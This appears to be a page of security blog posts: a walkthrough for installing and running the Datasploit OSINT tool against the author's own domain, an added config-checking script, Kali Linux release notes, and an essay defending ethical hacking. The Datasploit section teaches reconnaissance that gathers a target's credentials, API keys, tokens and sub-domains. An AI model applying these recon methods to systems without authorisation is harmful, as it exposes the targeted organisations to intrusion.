  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collates results, showing them in a consolidated manner
  • Tries to find out credentials,  API keys, tokens, sub-domains, domain history, legacy portals, and more as related to the target
  • Available as single consolidating tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
Next, a few pointers to keep you from losing your mind. This project is very much a work in progress, with lots of very frustrated users filing bugs and wondering where the support is. The team is doing their best, so be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not error gracefully; it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair; take note, and I'll talk you through it.
2) For ease, and the best match to the documentation, I suggest running Datasploit from an Ubuntu variant. Your best bet is to grab Kali, VM or dedicated, and load it up there, as I did.
3) My installation guidance and recommendations should hopefully get you running trouble free, follow it explicitly.
4) Acquire as many API keys as possible, see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum; they are, for all intents and purposes, required. Detailed instructions to acquire each are here:
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author.
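Pointer 1 above warns that Datasploit crashes rather than failing gracefully when an API key is missing, and step 6 lists the keys that are effectively required. The following pre-flight check is an added example, not code from the Datasploit project or from this post: it parses config.py statically (the file is never imported or executed) and reports which required settings are absent, empty, non-string or still a placeholder, so you learn about a gap before the first crash. The setting names in REQUIRED_SETTINGS, the placeholder values and the sample config are assumptions modelled on the API list above; compare them against your own config_sample.py before relying on them.

```python
"""Pre-flight check for a Datasploit-style config.py (added example).

Datasploit does not error gracefully on a missing API key, so confirm the
configuration is complete before running it. The file is parsed with the ast
module and never imported or executed: a config file should not need to run
code to be read, and this keeps the check safe even if config.py was edited
by someone else.
"""
import ast
from typing import Dict, List

# Assumed setting names, modelled on the API list in the post; the project's
# own config_sample.py is the authority for the real names.
REQUIRED_SETTINGS: List[str] = [
    "shodan_api",
    "censysio_id",
    "censysio_secret",
    "clearbit_apikey",
    "emailhunter",
    "fullcontact_api",
    "google_cse_key",
    "google_cse_cx",
    "zoomeyeuser",
    "zoomeyepass",
]

# Values that mean "not filled in yet"; sample configs often ship with these
# (assumed set, extend it to match the placeholders in your config_sample.py).
PLACEHOLDER_VALUES = {"", "XYZ", "PLACEHOLDER", "YOUR_API_KEY"}


def load_settings(config_source: str) -> Dict[str, object]:
    """Collect top-level `name = <literal>` assignments from Python source.

    Right-hand sides that are not literals (a function call, another name)
    are skipped rather than evaluated, so nothing in the file ever runs.
    """
    settings: Dict[str, object] = {}
    for node in ast.parse(config_source).body:
        if not isinstance(node, ast.Assign):
            continue
        try:
            value = ast.literal_eval(node.value)
        except ValueError:
            continue  # non-literal expression: cannot be evaluated statically
        for target in node.targets:
            if isinstance(target, ast.Name):
                settings[target.id] = value
    return settings


def missing_settings(config_source: str,
                     required: List[str] = REQUIRED_SETTINGS) -> List[str]:
    """Return required names that are absent, non-string, empty or placeholders."""
    settings = load_settings(config_source)
    gaps = []
    for name in required:
        value = settings.get(name)
        if not isinstance(value, str) or value.strip() in PLACEHOLDER_VALUES:
            gaps.append(name)
    return gaps


def check_config_file(path: str = "/etc/datasploit/config.py") -> List[str]:
    """Run the check against the config.py written in the install steps above."""
    with open(path, encoding="utf-8") as handle:
        return missing_settings(handle.read())


# Constructed sample config for demonstration only; no real keys or real file.
SAMPLE_CONFIG = '''
shodan_api = "constructed-sample-value"
censysio_id = ""
censysio_secret = "XYZ"
clearbit_apikey = "constructed-sample-value"
emailhunter = "constructed-sample-value"
fullcontact_api = "constructed-sample-value"
google_cse_key = "constructed-sample-value"
google_cse_cx = "constructed-sample-value"
zoomeyeuser = os.environ.get("ZOOMEYE_USER")  # not a literal: skipped, so reported
'''

if __name__ == "__main__":
    gaps = missing_settings(SAMPLE_CONFIG)
    if gaps:
        print("config.py is incomplete; fill in:", ", ".join(gaps))
    else:
        print("config.py has every required setting; safe to run datasploit.py")
```

Run it against the real file with check_config_file() after step 6; an empty list means every required setting holds a non-placeholder string. Values pulled from the environment at import time are deliberately reported as missing, because the static check cannot see them and a wrong environment would reproduce exactly the crash the post describes.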
Datasploit rapidly pulled results as follows:
211 domain references from Github:
Github results
Luckily, no results from Shodan. :-)
Four results from Paste(s): 
Pastebin and Pastie results
Datasploit pulled russ at holisticinfosec dot org as expected, per email harvesting.
Accurate HolisticInfoSec host location data from Zoomeye:

Details regarding HolisticInfoSec sub-domains and page links:
Sub-domains and page links
Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider.

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive:
Email OSINT
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. Reminder here: you'll really want to be sure to have as many API keys as possible, or you may find these buggy scripts crashing. You'll definitely find yourself compromising between frustration and the rapid, detailed results. I put this offering squarely in the "shows much promise" category, if the devs keep focus on it, assess for quality, and handle errors better.
Give Datasploit a try for sure.
Cheers, until next time...

Hacking WPA Enterprise with Kali Linux

Admittedly, somewhat of a click-bait blog post title - but bear with us, it's for a good reason. Lots of work goes on behind the scenes of Kali Linux, tools get updated every day and interesting new features are added constantly. Most of these tool updates and feature additions go unannounced, and are then discovered by inquisitive users - however this time, we had to make an exception.

Toolsmith Release Advisory: Kali Linux 2016.2 Release

On the heels of Black Hat and DEF CON, 31 AUG 2016 brought us the second Kali Rolling ISO release aka Kali 2016.2. This release provides a number of updates for Kali, including:
  • New KDE, MATE, LXDE, e17, and Xfce builds for folks who want a desktop environment other than Gnome.
  • Kali Linux Weekly ISOs, updated weekly builds of Kali that will be available to download via their mirrors.
  • Bug Fixes and OS Improvements such as HTTPS support in busybox now allowing the preseed of Kali installations securely over SSL. 
All details available here: https://www.kali.org/news/kali-linux-20162-release/
Thanks to Rob Vandenbrink for calling out this release. 

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

In Defense of Ethical Hacking

Pete Herzog wrote an interesting piece on Dark Matters (Norse's blog platform) a while back, and I've given it a few days to sink in because I didn't want my response to be emotional. After a few days I've re-read the post a few more times and still have no idea where Pete, someone I otherwise consider fairly sane and smart (see his bio - http://blog.norsecorp.com/author/pherzog/), gets this premise he's writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I'm confused where this point of view comes from! I'd genuinely like to know… I'll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here are my comments on Pete's blog post titled "The Myth of Ethical Hacking" (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/).



I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure, it’s done because business and technology along with your adversaries is dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That's an interesting distinction. I can't say I believe this is any more than a simple difference in word choice. Isn't this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I think this is one reason standards efforts by people in the security testing space were started, to demystify, de-obfuscate, and lessen confusion. Clearly it's not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here's a statement that I largely agree with. It's not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this standard, you can easily see that it's not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Standardizing how a penetration test (or ethical hack, these should be the same thing in my mind). Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it's like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I've heard some call Red Team exercises "closer to what an actual attacker would behave like"; your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you'll get high-grade talent. If you're looking for a cheap penetration test, your results will likely be vastly different because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what's going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That's the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Because tools look for patterns, and respond accordingly, there are times where a human can see an error message and understand what it's implying, but the machine has no such ability. In spite of all of technology's advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by extension software, do not think. This gives software a disadvantage over a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs proactive debate here. I don’t believe it’s productive to the post here, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which is not talked about enough I don’t believe. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways — is this thing called scope, and time. Penetration testers, ethical hackers and whatever you want to call them are time-boxed. Rarely do you get an open-ended contract, or even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are many, many, many ways to break in typically. Systems can be mis-configured, un-patched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
— Again, you're dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also employees that don’t know better. So what if it works though, you still need to leverage that testing to show real-use-cases of how your defenses were easily penetrated for educational purposes. Record it. Highlight those employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge…but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.